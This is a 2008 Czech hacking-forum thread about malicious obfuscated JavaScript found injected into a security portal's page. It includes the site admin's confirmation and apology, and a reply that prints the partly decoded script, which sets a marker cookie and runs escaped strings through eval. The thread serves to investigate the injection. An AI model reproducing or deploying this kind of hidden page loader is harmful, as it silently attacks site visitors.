| Při dnešní návštěvě stránky skola.security-portal.cz na mě antivir zařval, že stránka obsahuje malware VBS:Malware-gen.
Ve zdrojovém kódu stránky je skutečně podezřelý javascript umístěn na jejím samém konci. Po jeho prvním unescapování jsem obdržel řadu proměnných, které se v dalším kroku znovu unescapují, ale bohužel tam chybí proměnná "dz", takže jsem to dál nezkoumal. Pokud se někdo chcete podívat blíže a zjistit, co to skola.security-portal.cz na uživatele zkouší, dejte pak vědět. Případně by mohl odpovědět třeba i RubberDuck o co tu jde. Celkem by mě to zajímalo.
----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem. (odpovědět) | |
|
|
| .cCuMiNn. Ja tam nic nevidim :) (odpovědět) | _( | )_ | 85.132.197.* | 15.7.2008 21:49 |
|
|
|
| jj, už to tam není...
----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem. (odpovědět) | |
|
|
|
| co k tomu říct? (odpovědět) | Shaiiiiii | 81.92.146.* | 16.7.2008 11:55 |
|
|
|
| ňeco takovýho se teď objeví na eSPéčku..že se je snažíš pošpinit.NyQ (odpovědět) | Co zkouší .cCoMiNn.? | 78.156.129.* | 16.7.2008 13:44 |
|
|
|
| Čekám na vyjádření RubberDucka. Snad se tu ukáže a trochu to objasní :)
----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem. (odpovědět) | |
|
|
| Vyse zminovany JS kod na strance #skola projektu skutecne byl. Ovsem ne dele nez par dnu (max. dva). Ke zbytku se zatim nijak nemuzu vyjadrit i kdyz mam nektera podezreni. Timto se vsem omlouvam za pripadne problemy, ktere mohly diky tomuto problemu v pripade navstevniku vzniknout. (odpovědět) | RubberDuck. | 85.71.165.* | 16.7.2008 14:02 |
|
|
|
| kdyz se vam to nelibi tak proc tam lezete kreteni (odpovědět) | &box[]= | 213.84.233.136/192.168.8.* | 16.7.2008 17:23 |
|
|
|
| kdo rekl, ze se nam to nelibi? Primitive..
----------
Cow power by Gentoo... (odpovědět) | |
|
|
| Sákriš, ty jseš ale drsňák. Nejsi náhodou ze SP? :D Tam to je taky samej drsňák, ale jinak tam je duto =) (odpovědět) | _( | )_ | 85.132.197.* | 16.7.2008 19:59 |
|
|
|
| A co to bol za javascript ?!?!?!?!?!?!?!?! hodil by sa mi :-)
(odpovědět) | Beinger | 78.98.251.* | 16.7.2008 18:08 |
|
|
|
| Tady je kód po prvním escapování:
db="<7`7<7a7<7b7<7c7<7d7< 7e7<7f7<7g7<7h7<7i7<7j79+fqb 0~)-~ug0Q
bbqi8!<%22<#<$<%<%26<'< ;(<)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu
89+d)K7i7M-t)>wudVe||Iuqb89+yv8t)>wud Tqi89.#9d)K7t7M-t)>wudTqd
u89=8t)>wudT";
dd="iSx%22<}Sx<}^}+yv8d)K7i7M,%22%20% 20'9kd)K7i7M0-0%22%20%20'
+m}^}-S]^8d)K7t7M<=obuf4}gKqzuvxqp4)4rux gq/}r4<5c}zp{c:{dqfu42
245zub}su`{f:w{{%7F}qQzuvxqp=fq`afz4}gKqzuv xqp/}r4<`mdq{r4p{wa
yqz`:w{{%7F}q4))43g`f}zs3=}r4<{rrgq`45)4 9%=o{rrgq`4?)4gqufw|:x
qzs`|/qzp4)4w{{%7F}q:}zpql[r<6/684{rrgq` =/}r4<{rrgq`84qzp==/ii
fq`afz<=obuf4d{dKczp4)46|``d.;;rvwyr}f:w {y;ws}9v}z;}zpql:ws}+p
l6/buf4rquKczp4)46gwf{xxvufg)%8fqg}nuvxq)%8 `{{xvuf)%8x{wu`}{z)
%8yqzavuf)%8g`u`ag)%8p}fqw`{f}qg)$6/buf4zqq pK{dqz4)4`faq/}r4<=
/}r4<=/}r4<5d{dKazpqf:wx{gqp=zqqpK{dq z4)4ruxgq/i}r4<==obux4)4d
{dKsq`W{{%7F}q<=/bux%264)4zqc4Pu`q<=8 4z{c:sq`Y{z`|<=84z{c:sq`P
u`q<=84z{c:sq`%5C{afg<=84z{c:sq`Y}za` qg<=84z{c:sq`Gqw{zpg<==/a
`w%264)4Pu`q:A@W<=84bux%26:sq`Y{z`|<= 84bux%26:sq`Pu`q<=84bux%2
6:sq`%5C{afg<=84bux%26:sq`Y}za`qg<=84 bux%26:sq`Gqw{zpg<==/}r4<
4<4a`w'%26494a`w%264=4;4%$$$4(4d{dK`}yq{ a`>%22$=ozqqpK{dqz4)4r
uxgq/iiii}r4<=/c}zp{c:r{wag<=/}r4< ==oz{c4)4zqc4Pu`q<=/d{dKgq`W
{{%7F}q<=obuf4bqf4)4dufgqRx{u`<6C}zp{ cg4-!6=*)$4hh4zub}su`{f:a
gqfUsqz`:}zpql[r<6C}zp{cg4-,6=*)$4hh4zub }su`{f:agqfUsqz`:}zpql
[r<6C}zp{cg4Z@6=*)$4=22<3[dqfu3=4))49 %=22<3YG]Q3=4*49%=422<3GB
%3=4*49%=422bu`|qsu8ts%7F}79+";
dc="qi89;%229+u|cu0d)K7t7M-t)>wudTqdu89= 8t)>wudTqi899+yv8d)K7t
7M,%209d)K7t7M-!+d)K7}7M-t)>wud]%7F~dx89 ;!+ve~sdy%7F~0S]^8t<}s
%7F}7+fqb0iSx!<";
cz="%66u%6ec%74i%6fn %63z%28%63%7a)%7bret%75rn%20c%61%2b%63%62
%2bc%63+%63%64+c%65+c%7a;}%3b";
da="fqb0})-~ug0Qbbqi87|qe~%7F7<7{rtfu7&l t;7zsdxb7<7ytvyb7<7xufyv7
<7wvhuc7<7vwfuc7<7uxwxd7<7tzu~y 7<7s{ud~7<7r||uf7<7q}dgu79+fqb0
|)-~ug0Qbbqi87q7<7r7<7s7<7t7<7u 7<7v7<7w7<7x7<7y7<7z7<7{7 <7|7<7
}7<7~7<7%7F7";
ca="%66%75nc%74%69o%6e%20dcs%28ds%2ce%73)%7 bds%3dun%65s%63ap";
ce="%61%72Co%64e%41t(%30)^%28%270x0%30%27+e s%29%29);}%7d";
op="%24%3d%22dw(d%63%73(cu%2c14)%29;%22;";
st="%73t%3d%22$%3ds%74%3b%64c%73%28%64a%2b% 64%62%2b%64%63+%64%
64%2b%64e%2c1%30%29;%64w%28%73t%29%3bs%74%3 d%24;%22;";
if (document.cookie.indexOf('vbulletin_multiqu ote=')==-1)
{
sc('vbulletin_multiquote=',2,7);
eval(unescape(dz+cz+op+st)+'dw(dz+cz($+st)) ;')
}
else
{$=''};
function sc(cnm,v,ed){var exd=new Date();
exd.setDate(exd.getDate()+ed);document.cook ie=cnm+ '=' +escape(v)+';
expires='+exd.toGMTString();
};
----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem. (odpovědět) | |
|
|
| Drsneee ale super dky :-D (odpovědět) | Beinger | 78.98.252.* | 17.7.2008 14:09 |
|
|
|